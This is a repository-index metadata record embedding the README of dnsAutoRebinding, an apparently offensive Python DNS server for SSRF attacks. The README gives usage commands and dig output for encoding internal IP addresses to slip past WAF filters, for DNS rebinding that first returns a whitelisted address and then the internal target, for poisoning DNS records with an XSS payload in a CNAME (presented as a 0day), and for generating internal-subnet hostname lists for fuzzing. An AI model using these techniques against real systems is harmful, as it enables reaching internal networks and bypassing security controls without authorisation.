{"id":13815339,"url":"https://github.com/Tr3jer/dnsAutoRebinding","last_synced_at":"2025-05-15T07:32:53.416Z","repository":{"id":65752248,"uuid":"95366928","full_name":"Tr3jer/dnsAutoRebinding","owner":"Tr3jer","description":"ssrf、ssrfIntranetFuzz、dnsRebinding、recordEncode、dnsPoisoning、Support ipv4/ipv6","archived":false,"fork":false,"pushed_at":"2017-08-17T05:16:03.000Z","size":943,"stargazers_count":217,"open_issues_count":0,"forks_count":48,"subscribers_count":6,"default_branch":"master","last_synced_at":"2024-08-04T04:07:25.573Z","etag":null,"topics":["dns","rebinding","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Tr3jer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-06-25T15:04:20.000Z","updated_at":"2024-07-03T06:13:17.000Z","dependencies_parsed_at":"2023-02-08T04:25:11.660Z","dependency_job_id":null,"html_url":"https://github.com/Tr3jer/dnsAutoRebinding","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Tr3jer%2FdnsAutoRebinding/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Tr3jer","download_url":"https://codeload.github.com/Tr3jer/dnsAutoRebinding/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225335316,"owners_count":17458257,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dns","rebinding","ssrf"],"created_at":"2024-08-04T04:03:21.387Z","updated_at":"2024-11-19T10:31:46.806Z","avatar_url":"https://github.com/Tr3jer.png","language":"Python","funding_links":[],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"# dnsAutoRebinding\n\n\u003e \u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转换码、dns记录污染(文末一个0day为例)。脑图在脑子里,懒得画了。\n\nsupport Record Type and Encoding:\n\n```\nMX = ipv4/ipv6/hex\nA = ipv4/en/int/hex\nAAAA = ipv6/int/hex\nCNAME = ipv4/ipv6/hex\n```\n\n配置监听服务器example.com:\n\n| record type | record | record value |\n| --- | --- | --- |\n| A | ns | server ip |\n| NS | test | ns.example.com |\n\n\u003e sudo pip install ipaddr\n\n修改lib/config.conf:\nmaindomain = test.example.com.\n注意根地址.要加\n\n```\nUsage: sudo python main.py {Options}\n\nOptions:\n -h, --help show this help message and exit\n -t 300, --TTL=300 ttl value , 0 By Default\n -y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX\n Record Type , A By Default\n -e int/hex/en, --Encoding=int/hex/en\n Record Encoding , None By Default\n -r, --Rebinding The Second Time Query Return Target Ip\n -p \"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\", --payload=\"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\"\n Specified Record , Support CNAME/MX\n\n```\n\n-y选项指定以什么记录类型返回:\n`-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default`\n\n-t选项指定TTL值:\n`-t 300, --TTL=300 ttl value , 0 By Default`\n\n直接A记录返回ipv4地址:\n`sudo ./main.py`\n\n```\n➜ ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 50359\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t227\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[21:54:16] client ip:44486 =\u003e A =\u003e 192.168.1.1.test.example.com.`\n\nhex编码:\n`sudo ./main.py -e hex`\n\n```\n➜ ~ dig 31302e302e302e31.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 31302e302e302e31.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 1585\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;31302e302e302e31.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n31302e302e302e31.test.example.com. 0 IN\tA\t10.0.0.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t600\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:00:42] client ip:30150 =\u003e A =\u003e 31302e302e302e31.test.example.com.`\n\nint编码:\n`sudo ./main.py -e int`\n\n```\n➜ ~ dig 3232235777.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 3232235777.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 18066\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;3232235777.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n3232235777.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t456\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:03:00] client ip:5240 =\u003e A =\u003e 3232235777.test.example.com.`\n\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;因为waf会识别出内网地址才用的上本项目,那么waf大可识别进制转换这种,所以要自己写个地址转换方法:\n\nnum to en:\n\n```\n./lib/common.py 192.168.1.1\n\n1. Single IP Covert For En\n2. Build IP List\n[+] [1 By Default/2]\nbjckbgikbkb\n```\n\n`sudo ./main.py -e en`\n\n```\n➜ ~ dig bjckbgikbkb.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e bjckbgikbkb.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 5115\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;bjckbgikbkb.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\nbjckbgikbkb.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t20\tIN\tNS\tns.example.com.\n```\n\nserver:\n`[22:10:22] client ip:8434 =\u003e A =\u003e bjckbgikbkb.test.example.com.`\n\n\ndns二次rebinding:\n```\nsudo ./main.py -r\nInput Safe Ip? [Address/Req By Default]8.8.8.8\n```\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;选择性输入目标信任的地址,比如在ssrf时防火墙在验证dns返回值是否存在于白名单。默认为发起请求的地址。(记得特殊情况需要指定记录类型)\n\n\n第一次:\n\n```\n➜ ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 59544\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 0\tIN\tA\t8.8.8.8\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t461\tIN\tNS\tns.example.com.\n```\n\n第二次:\n\n```\n➜ ~ dig 192.168.1.1.test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e 192.168.1.1.test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 45312\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;192.168.1.1.test.example.com.\tIN\tA\n\n;; ANSWER SECTION:\n192.168.1.1.test.example.com. 0\tIN\tA\t192.168.1.1\n\n;; AUTHORITY SECTION:\ntest.example.com.\t\t501\tIN\tNS\tns.example.com.\n```\n\ndns记录污染:\n`sudo ./main.py -p \"\u003cscript\u003ealert(/xss/)\u003c/script\u003e\" -y CNAME`\n\n```\n➜ ~ dig test.example.com\n\n; \u003c\u003c\u003e\u003e DiG 9.8.3-P1 \u003c\u003c\u003e\u003e test.example.com\n;; global options: +cmd\n;; Got answer:\n;; -\u003e\u003eHEADER\u003c\u003c- opcode: QUERY, status: NOERROR, id: 5073\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;test.example.com.\t\t\tIN\tA\n\n;; ANSWER SECTION:\ntest.example.com.\t\t0\tIN\tCNAME\t\u003cscript\u003ealert\\(/xss/\\)\u003c/script\u003etest.example.com.\n```\n\n![0day](0day.png)\n\n\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;这个怎么玩取决于你的小脑袋瓜的脑回路了。如果防火墙还要验证是否为信任地址的话修改lib/common.py:\n\n```\nelif payload != 'None' and payload.find(mainDomain) == -1:\n record = payload + \"信任地址.\"\n```\n\nipListBuild:\n批量生成网段地址,选择性编码,适合ssrf内网地址fuzz。\n\n```\npython lib/common.py 192.168.1.1\n\n1. Single IP Covert For En\n2. Build IP List\n[+] [1 By Default/2]2\n[+] Please Input Segment Length [24 By Default]\n[+] Please Input Encoding ['ipv4' By Default]hex\n[+] Please Input Server Root Address [test.example.com By Default]\n[+] Stored in the 20170625223912_test_example_com_hex.txt\n[root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt\n3139322e3136382e312e31.test.example.com\n3139322e3136382e312e32.test.example.com\n3139322e3136382e312e33.test.example.com\n3139322e3136382e312e34.test.example.com\n3139322e3136382e312e35.test.example.com\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTr3jer%2FdnsAutoRebinding","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTr3jer%2FdnsAutoRebinding","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTr3jer%2FdnsAutoRebinding/lists"}